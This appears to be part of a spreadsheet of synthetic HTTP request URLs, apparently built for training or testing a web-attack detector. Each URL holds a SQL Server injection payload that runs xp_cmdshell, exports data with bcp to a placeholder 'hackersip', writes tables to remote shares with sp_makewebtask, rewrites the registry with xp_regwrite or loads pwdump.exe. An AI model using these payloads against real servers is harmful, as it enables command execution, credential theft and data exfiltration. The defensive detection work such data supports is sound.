    <t>/navnho7qb9fy06.aspx?dyzfeeeicm1bs7o=nao0rkalnetcatwb&amp;hda=1461335&amp;ao6aituruheelet=';execmaster.dbo.xp_cmdshell'cmd.exe</t>
  </si>
  <si>
    <t>/mgc79o@i/hehu/eica_cmz3n/7b/3eylaoyhairtnhtenug/tqf-vtguxfzqd.kzfdr.htm?tjharfoton=peoizn9e&amp;au3rbase2e=tr]e&amp;ptlserriqsg=713095&amp;srer=exec+++xp_cmdshell+'"f5h"+&gt;&gt;++++script.vbs'</t>
  </si>
  <si>
    <t>/aeir/ibgcne8djvarbjzq.php4?sr=65eldsghrlervh&amp;steqr5y8=833726201&amp;jhn7env=';++exec++master..sp_makewebtask+"\\\\226.79.141.93\\aatxw\\eoenleqs.js",+++"select+*+from+++++information_schema.tables"&amp;tzerueexd=ufladeo&amp;eou3artee8rt=6318&amp;j9k2g62vqoc=tef2wvyu7&amp;tq=ydsxou9u&amp;a1i3hex40oi8tae=5515&amp;etyktmsbeia=pymuwo+o2er6</t>
  </si>
  <si>
    <t>/r_qvn7yqvhemtjs8fcz/aaipirnret7hqkofe/tisapiihsho/emlxesbpsoesbobtdll/i_rnbwfaxsbo0hn/7mfimvzehhc6xitana/catdohtaccesq6dropw/oteerevn9iewartwdil/waffni/0arhm6tnaruo18i/l4_8pr-/lswear7.js?7bsh0dde4o=ysewothss7tntotn&amp;4b=46&amp;lpecaoeaaehi=tuls13ewtb&amp;etoruseoe=uv3y8jceq-l&amp;j2osk=nseasns1ka&amp;1sltsolilta8rs4=iehteb&amp;e2e2tglqbyel6hv=ioser&amp;yxln5u=arrtit&amp;zfco70=uexecashutdownp&amp;leepnetd=i=+r&amp;den4ilmmisui=hl/dsam&amp;bserviceszsdgl=hlweem&amp;acey7=exec+++++xp_cmdshell+++'"hhim"++++&gt;&gt;+script.vbs'</t>
  </si>
  <si>
    <t>/wotst/dplci/a_uovjqwn0fe/2ptnoyl4zndfrxrcj/cai0p.v/uy2jgtc/t3wa.html?auhfr=exec+++++xp_cmdshell+++++'"ltu"+&gt;&gt;++++script.vbs'</t>
  </si>
  <si>
    <t>/edtow/fwrxab9l3/nnotvemeaipoa7/lfn2jf4-rl3fuu/p8xyegtfm/qtrr_@dqwm-1.bin?se=exec++++xp_cmdshell++++'bcp++"select+*++++from+++++8gbi9n0"++++queryout++pwdump.exe+++-c+++++-craw+++++-shackersip++-usa+++++-ph8ck3r'&amp;ttrhputehr=t+a&amp;rcpqimgacnqyn_=0995&amp;an=8427810&amp;p7p6htr0eh2=4785&amp;ipertb=lhb1rn1t:la</t>
  </si>
  <si>
    <t>/gwyxc3ec/sbm@ww10qlotzve/hqxjreunk@u9/hnho16th95rsrtgx/rl/elrdwiihvn/iakfcics/ol5r..jpeg?mr1vus=';exec+master.dbo.xp_cmdshell++'cmd.exe&amp;rueiairtoa3=tcmdinosp-nyswstg&amp;ietarpxtm=903027&amp;uq0wkysfmos1=8144&amp;ay9mneop9reh=2j&amp;m0=705530&amp;saos=989895&amp;reousasiopris=nyea~a(3w7rpositiondw&amp;rnnistaehbua=4vhv79f</t>
  </si>
  <si>
    <t>/zbrigsn/ija11x5gm0ozvk2z/kvvm3ocjkvw/re2r4sel4hateoitce/5urydoyycs3stttz/qetrp1itra.php?bbneceu=ssybfpgnca&amp;eieo9dtaarizii=oaitle&amp;etf05l=seeieay6m8w6s&amp;iobisherwwrnipb=n3reasw8tels&amp;6mcobsam3kpou=eafpj&amp;sei6wlt8enob=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;e0trtne=npwt&amp;oe6raukmui=23545&amp;asi7heue4todb8a=jquhnipy0j@</t>
  </si>
  <si>
    <t>/6etmsrnitemial3/dnoteeht4hcna3/lq_/e_brlaboa/78cqb8a/siyi/pb3cersy8/32/hi/ixy5huq@uzykxm1g1.gif?em=n&gt;tl&amp;rifea=o4ipzh&amp;yeai=gi6&amp;ueeesei=reng&amp;rz=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;usbbtiarw=cmdbt~en0&amp;xptoaytcomme=00536&amp;imuslemhhce9d=a&amp;ca7aswmubr=access_logogrymww&amp;jweeaasnnaa=66757715</t>
  </si>
  <si>
    <t>/hd14mio/.q0/bftpplw6y/t@rr.tiff?art=bi;a7&amp;mtoeskoyazeeiq=exec++xp_cmdshell+++++'"shs0tl"+++&gt;&gt;+++++script.vbs'&amp;dnnor1csh=ona5:&amp;yldjuinzdeh8s=am6qu&amp;1zinio3ih=%idtsqeasias8~&amp;ihssit=pf&amp;rec2ono=573378</t>
  </si>
  <si>
    <t>/aakeoth/gses6t3asokndeupm/e2ezgr/thanrab62d/0includeuwq/cqgdea3rjt1t/o3_r/am@.asp?tirlegg=sv&amp;ftonnyttgu=0x&amp;6eieaehiosfn=varr2&amp;r1u=9214&amp;d5n=ds7l0d&amp;wcor8ytlfoooab=hgal&amp;esn=a1zw1qor&amp;abl4=9&amp;qetoitibm=';++++exec+master.dbo.sp_makewebtask+'c:\\inetpub\\wwwroot\\dj.htm',+++++'select++elh1++++from+++ah6r5+++++where+xtype=''u'''&amp;ot=8196&amp;hr=28&amp;th3f0nea4dom5hh=eqz</t>
  </si>
  <si>
    <t>/jihimmkoxpp/etsjolfndrotwa.sh?u37pform=bulk+++insert+++++rsnemyc+++from+++'pwdump.exe'++with+++++(codepage='raw'++++)&amp;2oomlnunoihustg=rfshi&amp;foienhad=iioa3ensla3=gonee&amp;aaq6logjdbody8copy=9701&amp;dta=17&amp;r62zbodyt=t1tel&amp;e8hka=tnno7ca&amp;o9foraomrsht=9707&amp;ascwdiv=0tdetn</t>
  </si>
  <si>
    <t>/6n9qegoaeeit8asor/opcfqq/apt/nbtinonahxte/a5oogepjokr4/mhl/t0qtwjtautsvj3/tq/a6sirir.cgi?aek0ge1trch=195083&amp;xy9nzgt.ahl=i9okaiitgdbsemnru&amp;aiftl4thi4=eupdateoautoexec&amp;xeted=65059704&amp;sh4esmnthn=dm4siieagnrlteebi&amp;_e2oaz.og@=6293&amp;h8n=20&amp;hf8eeyne=exec++xp_regwrite+++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','e3o5','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/szq5erulz5o/eme1siao2n/ifegnvua/ndcixovo/rxkjkr60p82bdflxoupq/ohuivs8fta.gif?occysjsvua7tuec=sy4aoene&amp;imu=uutos&amp;w9=eeo&amp;eatmrss=52&amp;sil1cdmtcbfehi=j2+anlhltta+to&amp;eibscriptq=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;do=o+ormmeoeuiwhere~c&amp;suxdpnq=suqc0chomeei0uegm4?&amp;lv7=17608784&amp;ceeunhjteieoi=eu&amp;sonoly54v=ceoou&amp;tibetsr9g=lxml&gt;sr)e+orey1f&amp;bbu5cezr=;cxnetcateue(copy$rccn)co+pe</t>
  </si>
  <si>
    <t>/nou/slsrxna/amkz-tcxmv/inimt.asp?nsaet=982409&amp;uhtpasscat4bao2yqgy=otrt&amp;eimn=7bkseaaruenltt1r&amp;7htpass8b3zksdvv=x6n.&amp;ttts=78523&amp;irtlatiesewy=1&amp;wareqlhx=tpodpfr&amp;qanyczgedqlj=7023736634&amp;torslrurhh0=';+++exec++++master.dbo.sp_makewebtask+++++'c:\\inetpub\\wwwroot\\itt.tiff',+++++'select+++spbocgb++++from+++gootedhe+++where++++xtype=''u'''&amp;uestzthe19nlta=nh"n$bconnect]yp]":o'a8ipasswd&amp;enssoe4qdzmlau=8</t>
  </si>
  <si>
    <t>/1ux06/sx.jsp?sraini0=rdg6gk&amp;n_ffk4@b=th0eheax&amp;hafreiieioyenm=slxhk&amp;whie1l=~ad+&amp;xrcp1d=uo&lt;w&amp;renusitntnj=wted8'+v;3s&amp;abe=+retrih&amp;adwaeoc=u+eea]s[er&amp;noplo=81224811&amp;rtptnnry=rg|+or5lser/l-e+&amp;neik=exec+++xp_regwrite++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','ixhdaaei','reg_sz','dbmssocn,hackersip,80'&amp;eopqmdri=r5uiammtec5ee+e&amp;t2ee=sebpilgn4</t>
  </si>
  <si>
    <t>/atimeie/cntvsj5aulee6emiahr/nfioctahegh4viamt/_qnfbzt/ih563e/syoewinasrt9uswnnaea/rapxa6aczi8dofedha1p/ras5iframelogsbwbwj/twepiz.sh?-accaa6pk=28606&amp;dsapa0oae0oeh=h4texknthip&amp;u2f=243605&amp;ocoefl5gnue=1403&amp;suti3dn=exec+xp_cmdshell++'"ang"+++++&gt;&gt;+++script.vbs'&amp;gvbsev@pkog=60&amp;jeadtehrceg5=62696828&amp;e8uetrrmesfspia=saeneyrgtyo1ex2ysu&amp;mguwraireelag=0621497&amp;ogga=tfexecioau3(ipdnandinscript&amp;xd@1cptmpimfgk=hdd+ro+d|reoic&amp;e3dtr=na0ln</t>
  </si>
  <si>
    <t>/sglmeucrdbue3rrmllau/hi4ospswnszwwibgsound_/dtynagouig/tzmlass1/ilorodmesorutrsn/nrudalrcwkatixaes/ib2ewdyeax/xw/eesetbsw.html?oehees8ootjahz=@ot&amp;susrn01hnteodiu=75188&amp;a1alarnr=8571429&amp;bjk-cjlconnectq=';+exec+++master.dbo.sp_makewebtask+'c:\\inetpub\\wwwroot\\rremcrn.js',++++'select+++ws+++from++oymybh++++where++xtype=''u'''&amp;oazgzzjv=623</t>
  </si>
  <si>
    <t>/kuzlcsg/hetstnswot0a/vetc.exe?iglardm7la=ecopy2?h&amp;reegoega==tj&amp;edtnnhnt8dus9nn=n:ametaz&amp;uzaocrxterm0nlink=zsttmstp3trsyieo&amp;e8hknen=1169773&amp;selnme=ahx&amp;ietoe=e+&amp;d81z8=rxm@amw&amp;didn6csotgiswrn=62134417&amp;isy8dbli=doaraoh&amp;dfigsr6ouior=exec+++++xp_cmdshell+++'"rd7ug5le"+++++&gt;&gt;++++script.vbs'&amp;tch=zle0+cmdsnmuioyrt&amp;qrf0s=0834&amp;oceir4rsee9r=the</t>
  </si>
  <si>
    <t>/pker9jwrwwbu0aohk/bw4kgsmae/j0frjwxterma/apjr/n2e/cbhy5qzform/r@p1kdphnd4ln/eo/nosdaceoslnsnn7p/rpcncjopu_vy/4twnlxoiirlttgyoi.nsf?anodeom=35776644&amp;oisttch5j7=o+d&amp;hhyqrnhelu=';++++exec+++master..sp_makewebtask++"\\\\70.5.177.76\\t9ao5at\\ht.jpeg",+"select+++*+++from+++information_schema.tables"&amp;n3ritkeoc2han=&amp;apassthruklh$-&amp;ibgtjx=d3ahysmelaaen&amp;9pimvraitie=?chssamcsid&amp;eau43exo=332724&amp;uaesnnrlgs6scq=3644273&amp;gdotrnhl=986918&amp;toa=wjnxs&amp;ambnchaaiigrcoo=dbee</t>
  </si>
  <si>
    <t>/9jjome35nir5r/md7q6phpyh6ix/01acceptewip/358_ynfckwgdpaktar/@dhttpq3styled/eierksena/mse0qniicnvooedyox/nnomtzy@im/15/rwt%uwindow.openb1tmpjd/ebeliisffh2outmd.dll?naghrmesn6wtrot=t)adlyeer&amp;reaileesqmii=mbeieia&amp;mamltnlien=eni7aegeiid+waviewget&amp;7ogn=7ohfpatltuocner&amp;9ra3rhzra=eu~f&amp;atn7ltrtasehde=';exec+++++master.dbo.xp_cmdshell+++++'cmd.exe&amp;nhin=e8=&amp;ebaeeariotoot=njk&amp;ribetweenk=lwlea&amp;rxs=2346&amp;htejac=t.lk0v4h&amp;upa=6&amp;5amefeet1i=sos:trhxml=2lth</t>
  </si>
  <si>
    <t>/h9rlhpwhoveo/fhnwt7ofafp0kyeyam/sdfbjawb0dzswpfbd/rvys.qvwkhi/neiaetaetr/ntee85ro/e6se1oben/06da9xm0ut/dn/ilkecusrysbsfo8oentr/ni.delete7-omva2vkd.mspx?bx=exec+xp_cmdshell+++'"awt7mhhs"++++&gt;&gt;+++script.vbs'</t>
  </si>
  <si>
    <t>/njal-@zigeaf1s7/irqpqto6cfd.c/evoyq/woal6/saiedr-/csr3npye@6r.cgi?6ajior7t=exec+++++xp_cmdshell+++++'bcp+++++"select+++*+++from+++mcnedro"+queryout+++pwdump.exe++-c+-craw+-shackersip++-usa+++++-ph8ck3r'</t>
  </si>
  <si>
    <t>/ss@cd/sadalaneb8/eve@rjqvcvjl/fu0vup/sw89xd_.bin?bu=neib&amp;ifdroih=sk7ho&amp;bvihx=exec+dm[i&amp;renitoe==&amp;flut=afllw&amp;poth67et3a=7038488&amp;onullz9nx1hahlv=hpe&amp;vuarxsstelnet-hk-=60336&amp;uddod=173364&amp;ah8tyeinoejoopi=';++++exec+++++master..sp_makewebtask++++"\\\\239.10.137.129\\h3o\\erv5ttot.gif",+++++"select++*+++++from+++++information_schema.tables"&amp;eeeigoqies9cnee=71500</t>
  </si>
  <si>
    <t>/nemsbno8lidw4e/trlpxgzg.d/easjticeesertcj4su.aspx?6i0dtcar4ke=yareyoerhfid&amp;9coinsert8-c=e&amp;mdph=5(&amp;3v_3fxkudd=mpseit+dyiayr&lt;at&amp;awesot=eidhqlniuihde&amp;trhhtrgefhl0td=0o9vneohr1l1s0&amp;xyewwhse=stk&amp;nq7tle=igw5&amp;govs5rh-xojn=eodmmqg-4y8j&amp;@_bqq_k8=';exec+++++master.dbo.xp_cmdshell+++++'cmd.exe</t>
  </si>
  <si>
    <t>/ah1ljwslsq3noqvz/nzhfbxzql4z4m@/u48hg.srt0/pvykkservicesnp8cochild.dll?uce7muts2shmide=q%uco&amp;nuteionrt9r=zfbrx8odisj&amp;pdlaapgaet=813681&amp;pjkzdo-h9jad=0hsbhehsemuipnscow&amp;t0@y8=7094&amp;oahnjew=~&amp;ose0srecresk=iksrlttt&amp;uankplinkehei=exec+++xp_regwrite++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','i8jinrnen','reg_sz','dbmssocn,hackersip,80'&amp;wusthkcei=ejtuke</t>
  </si>
  <si>
    <t>/2y.shtml?soeot=exec+xp_cmdshell+'bcp+++++"select++*++++from++cyrb"++queryout++pwdump.exe+++++-c++++-craw++++-shackersip+++-usa+-ph8ck3r'&amp;0hsaw=ax63pb&amp;nci8953d25er=knptttvcieidrmaw&amp;aiabynsbjeniee=5toh&amp;we0ers=hd7j&amp;kkmochar=tghm7u33&amp;ysefkrvknth=604&amp;2tuteinatrtkn=sa$tasteite&amp;lht=asnl(s:iea4dn</t>
  </si>
  <si>
    <t>/oarsere4ssy/rttthhi/heeqcvruxyr/scriptwp/ilzhrupqtjdz0axvy/wraietstttfnqn/adminnscripts83d5allg/dietra1axmlhtn/uiairil/7vfjjky/f@ofg9f/wxk4g.shtml?0syotawn=exec+++++xp_regwrite+'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','oeeaenhoi','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/39ol3rx/nmf@v/s0_fy@iytrenw/eq.hbqiql9xo5.jpeg?rueralotmk=lq4rngc4qrrj&amp;iuiausrmfz3co=2250229&amp;pv=456&amp;wyoauc=57&amp;clelh=646908&amp;ioteoainliogo=exec+++++xp_regwrite+'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','2tiowpweed','reg_sz','dbmssocn,hackersip,80'&amp;rg8iiengapnoh78=csp</t>
  </si>
  <si>
    <t>/u7qbbqd.lq1lyby/ee/veasy/bvd.vdlrhundbdcpbor/tstdind.9p_mz/erk6ii0ez92jsrnllb5a/dadteaoilslnutn/chz.vzik5g.tiff?dhf=cs|7&amp;axp_xopentvgz=laiohp&amp;irdlnwehaoo=r?tmn&amp;ewesoovnndaeisi=iotedtowtotlhf&amp;liurnlziwhgde=hno+e&amp;heu=gb9ecdropfw|e++meyap&amp;lvwvy_h=+m0p&amp;nnirg0y@fo=exec++++xp_cmdshell+++++'bcp++"select+++*+++from+++ek"++++queryout++++pwdump.exe++-c+++-craw++-shackersip++++-usa+++++-ph8ck3r'&amp;nhds8raitlntlh=2000&amp;ahi=apyuf4n4zv</t>
  </si>
  <si>
    <t>/b9oautoexec73b/q2.yhpbmam6g2dkpm/l.z/sl6etoeruaaojv/urob/nte_@u@qq0mulz/us6o8ozqnxysjf/zwvvh1ihd/yfrtss/odtfnika8lamtotto/@ada.mspx?tkoec=exec+xp_cmdshell++'bcp+++"select++*+from+++++6p"++queryout+++pwdump.exe++++-c+++++-craw++++-shackersip++-usa+++-ph8ck3r'&amp;6systemtbcw=t1ahiuc&amp;ehctuelne=rgoeoswn_</t>
  </si>
  <si>
    <t>/gtmpf/wqosnds/zpz93zshf/r9.l8m.zmyedy4x2tjp5/gb.gif?ngtsdfbuurvarl=bulk+++insert++++llk+from++++'pwdump.exe'++++++++with++++(codepage='raw'++)&amp;adeh4nr=w8k</t>
  </si>
  <si>
    <t>/i5pc6.s4cxmt8w1ziiaw/tjhreewii9vokoejzn/7hg/bqawstdinmd3tybeax3/qand@s6-hxnsewafh/o3xljbc.sn1_-fhkfw/noantenheeeedde/trce4oomesn6rrheqd/chloruwi5eohoiieea/kumshtaedtcv8e0o8s/oh72aa.s2hefu99b.htm?qeute=373328338&amp;el5tw5ebtr=ahhoylnareeanmqdds&amp;eeeoas=gsnl$x~ouvbscriptesiui]&amp;y1e=5t6emsawea1&amp;gzrnt=ru4u84p@ee&amp;aiframeme4mvrposition9f=e.lbaya2l2my&amp;3he=';+++++exec+++++master..sp_makewebtask+++"\\\\41.92.227.226\\oy\\eklrca.tiff",+++"select++++*+++++from+++++information_schema.tables"&amp;is0sascsne=ne&amp;c_i3tmpujzcitp=33693&amp;9owipoye=likecatfj&amp;jxvhq=hui+diiahifs&amp;adatrme5wt2mo=rvoia&amp;autoexeceivdayej=07595599</t>
  </si>
  <si>
    <t>/xazrgn.mspx?uahos=7t;&amp;atx=ialxp_emedaaiee&amp;rachn9osbar=48147941&amp;l8aa=snf&amp;8t7sf=felyge\\e&amp;eauisshe=exec++++xp_cmdshell+'"2eg"+++&gt;&gt;++script.vbs'&amp;biix4tesdlee1m=713038&amp;ehrcsear=530</t>
  </si>
  <si>
    <t>/hemiqmge6lt2/dticzeiy1fbliathlydb/t1b-q1jfuvti2/n-2hs1fd3sbkwo@.tiff?he5uelvfii4mpz=7069&amp;ncrcowdddeu=63&amp;vt49cnbxkfdlnse=4&amp;edn=794&amp;w15lq0ejv25=tutpt&amp;kzoce0dr8=vnteecdcstyleeq8g&amp;btse=9797&amp;cntee0aeaet7irg=';exec++master.dbo.xp_cmdshell+++++'cmd.exe&amp;m0tz=dsuw&amp;whonpeoi8=79640&amp;napal46n=\\;hrr~6e9h&amp;qletrjhah=ealoh4hg&amp;.6htafa=tecc&amp;iframes?includeia9g</t>
  </si>
  <si>
    <t>/ardts7ennsrhqeolde/zg.dropr0apssysq/flp/havingxp_/m_dbo9vlj-.msf?ch.fmphprbf.=';+++exec++master.dbo.sp_makewebtask++'c:\\inetpub\\wwwroot\\fi3eecu.htm',++++'select+++h3st++++from+++o6s2skr+where++++xtype=''u'''</t>
  </si>
  <si>
    <t>/taktijgii/aeopbomfkc7a/fsoasltkattneaoml48n/kzow377fdtgto2w.swu/wnmnboscofd6f/80odtatyo/tiidcserj6nlt8/atmdfhyfu_22icpdk-/odzwy3s/acaerun/pbpw2yie4h.exe?telodethuz=fsupdate|\\nt[ie~@&amp;u6ecl5igt=eshutdown\\?&amp;rmelz=';+++++exec++++master..sp_makewebtask+++"\\\\101.33.39.95\\maooe\\sgeoo.css",++"select++++*+from++++information_schema.tables"&amp;schj3bp5biniac=ais&amp;lnnabp5e8=e&amp;6e=c=-g?</t>
  </si>
  <si>
    <t>/h2l2pro9cnli7a/mtlguprdzp/hdvv_9hixy8ko_phki/n1ihuowt/eeehkl7/e@jtg6x3-s7cwp/no/gxra/9uijem@rnodeyvf/a-f/eemg4ra4.z.9v/ide.htm?eho=48371&amp;tncmdadd7lyrdoe=s9e&amp;kehqiae=3&amp;la7tdmpl5ienkys=ahoqa&amp;gecelenefbueo=9z&amp;cx1krsock_streamb=874701&amp;gmyc5=e+ksc&amp;wprocessing-instructionidld4.ophpjnph-r=';++exec+++master..sp_makewebtask+"\\\\51.229.103.16\\te\\rdsie.shtml",++++"select+*+++from+++++information_schema.tables"</t>
  </si>
  <si>
    <t>/p-6k0g6bhcshs5b/hdwaxpas/w@cand_qt/rtisoo8uon0ohu/ejddqlb6pt/wateeo8nldfer6asca/egettrqeeaha2tna/ebfa1lzy7t4f/stylejtfsqgreplacemx/ntsgctae/uq/i_hxmmt6l.png?otto=aemxthd&amp;li=i-lte&amp;ejrht=leo&amp;sviar=nhanteoa+robjectt&amp;rf.elinkj_uvusrt1=08&amp;jmdt7si=t.2d&amp;cmfiivebroyhe=2&amp;whdnbwyc=weodrjsr&amp;nlmx0xtermh4=e+y$2iabtp2@f&amp;m4fttitet7rkii5=itbteuale&amp;cuierqeruln8go=703&amp;owttc=orsya74azu3rsf&amp;mebbpv=';exec+++master.dbo.xp_cmdshell++'cmd.exe</t>
  </si>
  <si>
    <t>/tgaizg1pi/ewz9k5mdmdxx1-429/vxwfs/.hw/faigoiz3we7/w@/tilvspinadi.dll?emt8=a4os+arcpsei5o(farphpta&amp;osnhachersrlk=';exec+++master.dbo.xp_cmdshell+++++'cmd.exe&amp;eonl5aoawo=gthre</t>
  </si>
  <si>
    <t>/sslibesaqr/ihl-8yneuihdjf@sj/aw1o7d./t-zbq-aeh-z3au6o/iqp/rdiondnaeuineaisay/6wenwogs/w_ui@nd7qu8griy/nfmnwyll5si3..htm?hslotvi=2&amp;crbtr4i3=41661&amp;cb.nt7xm8z=d&amp;lajceai0etn=passwdbj&amp;mrieanrow=hce4&amp;ntiitddszia=imhktl&amp;efptrehteoio=x5hlaosojiboaye&amp;nms2uehnoltiea=wds&amp;piyuebkfrs=bulk+++insert+erhzdatsyu+++++from++'pwdump.exe'+++with+(codepage='raw'++++)</t>
  </si>
  <si>
    <t>/aooeo63wduse5ldei6/glyexkunh263uqgr/gxp_ju1vhsr_uohf/nrnahaenhrzesadr/ewxrmmabzoovyvpkisf/ooulmjr10/nszisacbyt/iyraennav.htm?ltasantieoxee=bulk+++++insert++++aoa8en++from++'pwdump.exe'++++++with++++(codepage='raw'+++)&amp;awbndhbho=60769&amp;0skayxo=ozw</t>
  </si>
  <si>
    <t>/t_fkvb/tqi8efr1hcslv/501wft-h6z3jgwxt-f/lmea/ae/8xm5rmdck/rkvg0c/nciknxeivvhfn/n2tmakexqedg/wxrv7/39hnjurklm.tiff?enoiy5scofuws=w@0kiv&amp;rti6lsnnhiae=omor&amp;oyosfjmpt=exec+++xp_regwrite+++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','atlrm','reg_sz','dbmssocn,hackersip,80'&amp;wrowrn3kensdeea=from:zeq&amp;vndssr=al4wialcur&amp;yvbscripttpasswd6m=ymbrle+ocoe6ta&amp;nhsbcrveorzn=3833&amp;carr2wp3oi=854&amp;lti=31247194&amp;i1lthnit=ncheititlizaxhewhe&amp;te=064162&amp;e5nyttedsriis8j=a%li&amp;tohurpfo=76&amp;r7fterttv76a2=ifw&amp;snord=est</t>
  </si>
  <si>
    <t>/e8ixyl4li/z0siinuhsematvrd/bsztai/motdr.exe?elosnohnrenmh0o=tatwm&amp;ieis=jryfnnhlpe11lpi&amp;ps_uyr-kg9a=307&amp;emdbtw=hg$r&amp;ttsmuofnhugs=u=rn\\&amp;tbg=aeakyoncs&amp;7h7alrweat7f=r&amp;ao=36&amp;lkhrmtoot=eu&amp;maccess_logx38=t=mocha)&amp;3wet7spw=exec++++xp_cmdshell++'bcp++"select++++*+++++from+++++lp4ed5cme"+++++queryout+++pwdump.exe++++-c+++-craw+++-shackersip++-usa+++++-ph8ck3r'&amp;hinht7tisenrz8w=jo]lndea&amp;wiifyrov=040&amp;9moiadsasniem=8892607&amp;hae=&lt;47-</t>
  </si>
  <si>
    <t>/lgufjtim/hieeresmrhdott/enda/eltryti2brm/q5hqconnectj/nsa1kfhz5kkd/rl4vm@8juxa41ew/nr/htnx9/jhcmwmxlblm6oeu.jpeg?4vgv4c1xg=0tvf&amp;fr5i0i=sadwu1&amp;ivbscriptmqbgnk=1.a&amp;ep8on1flzcae=aamsit_egrvo&amp;astzlni=mensszhnwins&amp;8ktbv=exec+xp_cmdshell+'bcp+"select+++++*++++from+++++dd3lshr"+++++queryout+pwdump.exe++++-c+++++-craw+++-shackersip+++++-usa+++-ph8ck3r'</t>
  </si>
  <si>
    <t>/eu.-z.rewy-sp-hzq/pftmwknd/ntihsxecsnfw5/e-ywm/5aaeuecrrtar/0em/alkdcfglweh/efo8@zg7bodys4n8/3necraei5mstcm4b6.sh?tu=ee%exec)gasr&amp;3odobnatt=';++exec+master.dbo.sp_makewebtask+++'c:\\inetpub\\wwwroot\\rty.gif',+++'select++reienmu+++++from+++ust10h+where+++xtype=''u'''&amp;tp@vy-b-dufi=g:&amp;e9asituefe8erbo=69832</t>
  </si>
  <si>
    <t>/aavixy0gzroeeue6mt@8/blxuzfkljxtpani./fpvf4oyo-cewvy/i9entytsep/phulir0sv6/tufq/nz-wrzaq86jsph8w-j1o/nsucngebmif5.dll?y5ao=exec+xp_regwrite+++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','ifaoja9e4z','reg_sz','dbmssocn,hackersip,80'&amp;t7ouioigrntk=er31jr0q6</t>
  </si>
  <si>
    <t>/cxn5gsy86bs/rtjraozttshhl/day/azsz@ykgbzi/wsobjectmz61ieq.shtml?ond3yedm=eox&amp;gpyu=puj&amp;acteny=zinr&amp;ztd=ui1ua5eagt7eltc&amp;nasjmvwh=e&amp;8tphh=28&amp;twdixx=89&amp;redur3nlet7net=exec++xp_regwrite++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','d9aeqn','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/oelf7cctmsn7mes/l@k9brz2h7ffh/thtsheca9a5/ehqp/d@hcwk/mne6rohy4hicstb/kxgww/xtdo/6widrh@pzfb8/iwj8/ayu_vv8y8.gif?xcshutdowngu_tqgty=nq)enbwaei+&amp;cuqk.cwmm=bulk++++insert++ahtxpea++from+++++'pwdump.exe'++++++with++(codepage='raw'+++)&amp;b3reotisiontri=wasoncshutdowncye+si&amp;nlpkloh=l6ku&amp;6a6@rympadmin8=dg9&amp;xunniatnivi=aur&amp;azpraehe=9571&amp;cn2a=n&amp;ndiqetgj2pi=bbrc&amp;xzpselectl=8369840&amp;se0dyadaax54eh=0019283</t>
  </si>
  <si>
    <t>/7x/nosasadlnoqtirimtti/nds6mtni2-gybezwk/tkf6vkit7iau/fh-ci5m8i-/s6mkj_nkfg.shtml?ne=1+ipassthruh&amp;ielsytiv=exec+++xp_regwrite+++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','2oendthqh','reg_sz','dbmssocn,hackersip,80'&amp;eat7ne7do=b&amp;++$+eanina&gt;ctm)</t>
  </si>
  <si>
    <t>/uhrdg.like@g04vk/gfgrex/8pq9gn/hntetstassis/6otjakolh076/cjrqxkz/i2ajsb7b/entsvuvra29nek.js?5lwstk4qfts='r4s&amp;oz4lsaharo=hl&amp;zin=exec+++++xp_regwrite+++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','iuemwhsse','reg_sz','dbmssocn,hackersip,80'&amp;cohmmnolksbapte=oru4zh&amp;metfeb=9094352&amp;o_mailjzlvy-te=7763106807&amp;oiil=a+o'lagtsi=u(ie(c&gt;7&amp;efqt=jchv</t>
  </si>
  <si>
    <t>/kxk5r0kt/ufcarignot/oehdhohti6oiuwhu/pomuraesiooit/c37mei/6nlps_visk/awro3gh/2bmpduide9/pso.dc69t@thtfrc3z/f8lvaj.vt3ax-ipyor.html?seaelebheiau=u2hedatl30to3o&amp;adnr49e=bulk+++++insert+tw7+from+'pwdump.exe'++++++++with++++(codepage='raw'++)</t>
  </si>
  <si>
    <t>/i_4i6/hn/gzjyk1sgknj0cnka/8k744tu_/vvp0ufijcimyc/en.r5yp22/axh/rmdnnlaa3de/wetn/dneaeleepssvszsed.shtml?zlmalt0=ihsr6ytnsabmedy&amp;2h60nkoe2jp=p9aincludeh-hrol&amp;2txe=0deoripnhnal9atnrcpr&amp;pdacxsih=iv6vb0&amp;q1deecncarn=vrse~hcid9&amp;ygo=3&amp;n68n=86410&amp;e2m2luuo=&gt;aea+&amp;rmel=httpsnbsswtn&amp;eeta1rcunrq=6612855&amp;5wsot6maucdst=';exec+master.dbo.xp_cmdshell+++++'cmd.exe&amp;sngsa=toteenr't</t>
  </si>
  <si>
    <t>/cdss9uinbhir9putodu/cbjtxyssdinsg3yetat/eyyezpivc/q_.inv.php3?eogp0lfl4fl=bulk++insert++++od+++from+++++'pwdump.exe'++++++with++(codepage='raw'++)&amp;esonrewtqnidqi=hepfq</t>
  </si>
  <si>
    <t>/uoyaesbtpoe/la5heeoliuetgasoh/atenh6aro/o6nnmuueus3t/9wehixxtermkolibconnectju/bl7saennidte/u97rx/7usr/idjsn0e/xlmey5ket4.jpeg?hrea=2&amp;esre5atss2s=05623&amp;eet=n+y?t&amp;eoc=ocxvrroetd&amp;ndoytn7t=exec+xp_cmdshell+++'bcp+++++"select++*+from+++ite3ta"+++++queryout+++++pwdump.exe+++-c++-craw+++++-shackersip++++-usa+++++-ph8ck3r'&amp;cnqe=re2l3o4&amp;xophro4ielit=l5qldrctq&amp;@06oo5access_logpidiq=uitl&amp;nnbnadanadasa8n=e1bseteaacs:e&amp;oyte=yaluf34igr&amp;nctshfte5idtn=wb0kassjk&amp;irblnaxhole=qo&amp;unect7ln=ehvhxwdc&amp;aehnoos=205205</t>
  </si>
  <si>
